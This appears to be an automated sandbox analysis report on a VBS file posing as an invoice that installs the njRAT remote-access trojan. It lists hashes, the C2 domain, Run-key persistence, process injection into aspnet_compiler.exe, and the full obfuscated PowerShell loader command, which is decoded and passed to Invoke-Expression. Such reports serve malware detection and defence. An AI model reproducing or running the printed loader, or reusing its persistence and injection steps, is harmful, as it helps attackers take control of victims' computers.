Analysis
- max time kernel: 151s
- max time network: 149s
- platform: windows10_x64
- resource: win10-en-20210920
- submitted: 18-10-2021 20:05

Tasks
- Static task: static1
- Behavioral task: behavioral1 (Sample: Invoice #019972.vbs, Resource: win7-en-20211014)
- Behavioral task: behavioral2 (Sample: Invoice #019972.vbs, Resource: win10-en-20210920)

General
- Target: Invoice #019972.vbs
- Size: 2KB
- MD5: ee3daa79d7ac4570d146aceb38253293
- SHA1: 40b16db43a5c60e9f6a0ec49ab984698a3d1129b
- SHA256: 1e00836862dc8fc7fd742e9df49a8b0d141b391139bfb1c5a23f20413eb6d639
- SHA512: 6342d990ce3ea3ab94e2086cfda644d29bd5ea852da17f81b28b6d6a915ab0c31e9ea3580d302a43f277fdea68f1a8afe4be1c4343b89831b29f46b0bf1b70aa
Malware Config
Extracted
- Family: njrat
- Version: v2.0
- CHEM
- C2: petrol-chem108.duckdns.org:40225
- Windows
- reg_key: Windows
- splitter: |-F-|
Signatures
- suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
- suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

- Blocklisted process makes network request (2 IoCs)
  Processes (flow | pid | process):
  8 | 1768 | powershell.exe
  23 | 1768 | powershell.exe

- Adds Run key to start application (2 TTPs, 4 IoCs)
  Processes (description | ioc | process):
  Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" | aspnet_compiler.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" | aspnet_compiler.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" | aspnet_compiler.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" | aspnet_compiler.exe

- Suspicious use of SetThreadContext (1 IoC)
  Processes (description | pid | process | target process):
  PID 1768 set thread context of 1856 | 1768 | powershell.exe | aspnet_compiler.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes (pid | process):
  1768 | powershell.exe
  1768 | powershell.exe
  1768 | powershell.exe

- Suspicious use of AdjustPrivilegeToken (30 IoCs)
  Processes (description | pid | process):
  Token: SeDebugPrivilege | 1768 | powershell.exe
  Token: SeDebugPrivilege | 1856 | aspnet_compiler.exe
  The following pair of entries is repeated for the remaining 28 IoCs:
  Token: 33 | 1856 | aspnet_compiler.exe
  Token: SeIncBasePriorityPrivilege | 1856 | aspnet_compiler.exe

- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes (description | pid | process | target process):
  PID 2116 wrote to memory of 1768 | 2116 | WScript.exe | powershell.exe
  PID 2116 wrote to memory of 1768 | 2116 | WScript.exe | powershell.exe
  PID 1768 wrote to memory of 1856 | 1768 | powershell.exe | aspnet_compiler.exe
  PID 1768 wrote to memory of 1856 | 1768 | powershell.exe | aspnet_compiler.exe
  PID 1768 wrote to memory of 1856 | 1768 | powershell.exe | aspnet_compiler.exe
  PID 1768 wrote to memory of 1856 | 1768 | powershell.exe | aspnet_compiler.exe
  PID 1768 wrote to memory of 1856 | 1768 | powershell.exe | aspnet_compiler.exe
  PID 1768 wrote to memory of 1856 | 1768 | powershell.exe | aspnet_compiler.exe
  PID 1768 wrote to memory of 1856 | 1768 | powershell.exe | aspnet_compiler.exe
  PID 1768 wrote to memory of 1856 | 1768 | powershell.exe | aspnet_compiler.exe
Processes
- C:\Windows\System32\WScript.exe (depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice #019972.vbs"
  - Suspicious use of WriteProcessMemory
  Child process (depth 2), launched by WScript.exe:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $HB='!` ~+ ~A ~$ `` `+ `^ ~^ `& `! `$ `E `A ~+ `` `^ `& `$ !0 +D !0 !& ^$ &` &` &0 +A !F !F +1 ++ !E +^ += !E +1 +& +~ !E +1 +1 +~ !F ^! &= &0 ^1 &+ &+ !E &` &$ &` !& +B 0D 0A !` `~ `` ~! `^ `& `$ `E `A `D `B `` `~ `^ `& `$ `A !0 +D !0 !& ^E `~ !D !D !D !D !D !D !D !D !D !D !D !D !D !D !D !D `~ ^! `+ !B !B !B !B !B !B !B !B !B !B !B !B !B !B !B !B ~` !& !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& !D !D !D !D !D !D !D !D !D !D !D !D !D !D !D !D !& !C !& &` !E ~& !& != !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& !B !B !B !B !B !B !B !B !B !B !B !B !B !B !B !B !& !C !& ^C `= `~ `E !& != +B 0D 0A !` ~+ ~$ `` `+ `^ ~^ `& `! `$ `E `A ~$ `` `+ `^ ~^ `& `! `$ `A `B !0 +D !0 !& `` `F !A !A !A !A !A !A !A !A !A !A !A !A !A ^1 `` ~+ ~` +C +C +C +C +C +C +C +C +C +E +E +E +E +E +E +E +E +E +E +E `& !& !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& !A !A !A !A !A !A !A !A !A !A !A !A !A !& !C !& ~& ^E `C ^F !& != !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& +C +C +C +C +C +C +C +C +C +E +E +E +E +E +E +E +E +E +E +E !& !C !& &! `= ^E !& != +B 0D 0A !` ~+ ~& ~$ `` `~ `+ ~! `^ `& ~= `$ ~~ `A `= ~+ `` `^ ~^ `& `$ `A !0 +D !& `= ^0 `~ ~$ !$ ^E ^0 !D !D !D !D !D !D !D !D !D !D !D !D !D ^0 ^+ ^0 ~` !0 !` `~ `` ~! `^ `& `$ `E `A `D `B `` +C +C +C +C +C +C +C +C +C +C +C +C +C +C +E +E +E +E +E +E +E +E +E +E +E +E +E +E `& `! `$ `E `A ~+ `` `^ `& `$ != !& !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& !D !D !D !D !D !D !D !D !D !D !D !D !D !& !C !& ^~ ^0 ~& ^0 !D `F ^! ^A ^0 `~ !& != !E ~! ^~ &0 ^C ^1 ^+ ^~ !$ !& +C +C +C +C +C +C +C +C +C +C +C +C +C +C +E +E +E +E +E +E +E +E +E +E +E +E +E +E !& !C !& `~ `^ `& `$ `A != !E !` ~+ ~$ `` `+ `^ ~^ `& `! `$ `E `A ~$ `` `+ `^ ~^ `& `! `$ `A `B !$ !` ~+ ~A ~$ `` `+ `^ ~^ !& != +B 0D 0A !^ !$ !& `= !& !B !& `~ ~$ !& != !$ !` ~+ ~& ~$ `` `~ `+ ~! 
`^ `& ~= `$ ~~ `A `= ~+ `` `^ ~^ `& `$ `A !0 !D `A ^F ^= ^E !0 !& !& != &C !^ !$ !& `= !& !B !& `~ ~$ !& != +B'.Replace('!','2').Replace('`','4').Replace('^','6').Replace('+','3').Replace('~','5').Replace('&','7').Replace('$','8').Replace('=','9');Invoke-Expression (-join ($HB -split ' ' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))2⤵
  - Blocklisted process makes network request
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (depth 3, launched by powershell.exe)
    Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/1768-131-0x000001A946BB0000-0x000001A946BB2000-memory.dmp (Filesize 8KB)
- memory/1768-124-0x000001A946B90000-0x000001A946B92000-memory.dmp (Filesize 8KB)
- memory/1768-117-0x000001A946B90000-0x000001A946B92000-memory.dmp (Filesize 8KB)
- memory/1768-118-0x000001A946B90000-0x000001A946B92000-memory.dmp (Filesize 8KB)
- memory/1768-119-0x000001A946B90000-0x000001A946B92000-memory.dmp (Filesize 8KB)
- memory/1768-120-0x000001A946B90000-0x000001A946B92000-memory.dmp (Filesize 8KB)
- memory/1768-121-0x000001A9628D0000-0x000001A9628D1000-memory.dmp (Filesize 4KB)
- memory/1768-122-0x000001A946B90000-0x000001A946B92000-memory.dmp (Filesize 8KB)
- memory/1768-123-0x000001A946B90000-0x000001A946B92000-memory.dmp (Filesize 8KB)
- memory/1768-159-0x000001A946B90000-0x000001A946B92000-memory.dmp (Filesize 8KB)
- memory/1768-125-0x000001A946B90000-0x000001A946B92000-memory.dmp (Filesize 8KB)
- memory/1768-126-0x000001A962A80000-0x000001A962A81000-memory.dmp (Filesize 4KB)
- memory/1768-127-0x000001A946B90000-0x000001A946B92000-memory.dmp (Filesize 8KB)
- memory/1768-116-0x000001A946B90000-0x000001A946B92000-memory.dmp (Filesize 8KB)
- memory/1768-156-0x000001A962A40000-0x000001A962A43000-memory.dmp (Filesize 12KB)
- memory/1768-133-0x000001A946BB6000-0x000001A946BB8000-memory.dmp (Filesize 8KB)
- memory/1768-144-0x000001A946BB8000-0x000001A946BB9000-memory.dmp (Filesize 4KB)
- memory/1768-155-0x000001A946B90000-0x000001A946B92000-memory.dmp (Filesize 8KB)
- memory/1768-115-0x0000000000000000-mapping.dmp
- memory/1768-132-0x000001A946BB3000-0x000001A946BB5000-memory.dmp (Filesize 8KB)
- memory/1856-165-0x0000000005960000-0x0000000005961000-memory.dmp (Filesize 4KB)
- memory/1856-158-0x000000000040838E-mapping.dmp
- memory/1856-162-0x0000000005300000-0x0000000005301000-memory.dmp (Filesize 4KB)
- memory/1856-163-0x0000000005D80000-0x0000000005D81000-memory.dmp (Filesize 4KB)
- memory/1856-164-0x0000000005470000-0x0000000005471000-memory.dmp (Filesize 4KB)
- memory/1856-157-0x0000000000400000-0x000000000040E000-memory.dmp (Filesize 56KB)
- memory/1856-166-0x0000000005910000-0x0000000005911000-memory.dmp (Filesize 4KB)
- memory/1856-167-0x0000000005B60000-0x0000000005B61000-memory.dmp (Filesize 4KB)